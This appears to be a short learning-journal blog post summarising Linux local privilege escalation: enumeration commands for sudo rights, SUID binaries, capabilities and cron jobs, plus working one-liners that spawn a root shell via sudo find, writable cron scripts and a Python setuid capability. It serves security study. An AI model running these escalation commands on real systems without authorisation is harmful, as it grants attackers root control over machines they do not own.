Day 14 of my #1HourADayJourney. Today, I consolidated everything I've learned about Linux Local Privilege Escalation. When an attacker gains initial access, the next mission is always the same: Find the path to Root.
🛠️ The Enumeration Checklist
Before trying any exploits, an auditor must perform rapid enumeration. These are the 4 commands that often reveal the "Golden Ticket" to root:
# 1. Check Sudo privileges
sudo -l
# 2. Search for SUID binaries
find / -perm -4000 2>/dev/null
# 3. Check for Linux Capabilities
getcap -r / 2>/dev/null
# 4. Inspect Cron Jobs
cat /etc/crontab
🔓 Top Privilege Escalation Vectors
1. Sudo & GTFOBins
Some binaries are designed for interaction. If a user can run find as sudo without a password, they can execute:sudo find . -exec /bin/bash \; -quit
Always reference GTFOBins to see if a binary has an "escape to shell" function.
2. Writable Scripts in Cron/Services
If a root-owned process runs a script that is writable by your user group, it's game over.The Exploit: Simply append /bin/bash or a reverse shell payload to the script and wait for the system to execute it as root.
3. Linux Capabilities (The Modern Vector)
Capabilities like cap_setuid+ep on a binary like Python allow it to manipulate UIDs.Exploit: python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Follow my journey: #1HourADayJourney
Top comments (0)